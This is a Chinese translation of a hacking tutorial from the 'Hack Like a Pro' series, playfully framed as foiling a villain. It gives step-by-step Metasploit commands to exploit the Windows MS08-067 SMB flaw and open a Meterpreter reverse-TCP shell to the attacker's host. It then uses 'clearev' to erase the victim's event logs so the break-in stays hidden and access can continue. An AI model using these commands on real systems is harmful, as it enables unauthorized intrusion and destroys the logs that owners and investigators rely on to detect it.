掩盖浏览痕迹不会被发现的方法
BY OCCUPYTHEWEB
05/27/2016 3:26 AM
HACK LIKE A PRO
拯救世界免于核毁灭。世人也许不知道你做了什么,但我知道。棒极了!
![图片描述](upload/attach/201904/840827_P4UKZR5ZFGS2WKX.png)
既然我们进入了这个恶毒者的电脑,暂时切断了他的核发射能力,我们还必须想方设法掩盖我们的踪迹,让坏蛋以及坏蛋的爪牙无法追踪到我们的善行。
在这次对黑客攻击中,我们将再次进入他的电脑,植入检测仪,并从他的日志文件中删除我们在那里的全部痕迹。启动metasploit,开始删除我们在坏蛋的电脑上的证据。
步骤1 .再次破坏他的系统
从最初侵入坏蛋电脑的相同攻击开始:
exploit/windows/smb/ms08_067_netapi
但是我们不使用VNC有效载荷,而是使用Meterpreter有效载荷。
类型:
msf> use exploit/windows/smb/ms08_067_netapi
![图片描述](upload/attach/201904/840827_K6CXREE6X33JCZ9.png)
在开始操作之前,让我们进一步了解一下这个漏洞类型:
msf exploit(ms08_067_netapi) info
这应该会带来下面的截图提供一些关于这个漏洞的基本信息。可以看到,这种攻击利用了netapi dll中的一个解析缺陷。通过这种方式,可以将我们自己的有效载荷放在系统上,在本例中是Meterpreter。
![图片描述](upload/attach/201904/840827_63E42EETK3WSYDS.png)
输入以下命令来加载负载:
msf exploit(ms08_067_netapi) set PAYLOAD windows/meterpreter/reverse_tcp
现在已经有了漏洞和有效负载集,然后需要设置选项。在这种情况下,需要设置LHOST(我们为攻击者)和RHOST(被攻击者,坏蛋计算机)的IP地址。只需输入您和他的计算机的IP地址。
![图片描述](upload/attach/201904/840827_JDAGUEBTY37WX5A.png)
步骤2 .控制他的电脑
现在我们已经设置好了控制,只需输入:
msf exploit(ms08_067_netapi) exploit
如果成功,应该会在屏幕上看到一个Meterpreter提示符。即现在完全控制了坏蛋的系统!
![图片描述](upload/attach/201904/840827_5B3ECBEMUM2ERNZ.png)
在meterpreter提示符下,输入:
meterpreter > clearev
正如在上面的截图中所看到的,这个命令继续清除我们好战的坏蛋计算机上的事件日志,这样他和他的部下就不会知道我们曾经到过那里。如果我们能看到他电脑上的事件日志,我们就能看到所有的事件都被清除了。
![图片描述](upload/attach/201904/840827_S46DVXG2CFZ3HMS.png)
这对保护我们被发现是至关重要的,而且我们可以继续访问他的电脑。一旦他们知道有人入侵了他的电脑,他们很可能会采取措施防止我们再次侵入他们的电脑。
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课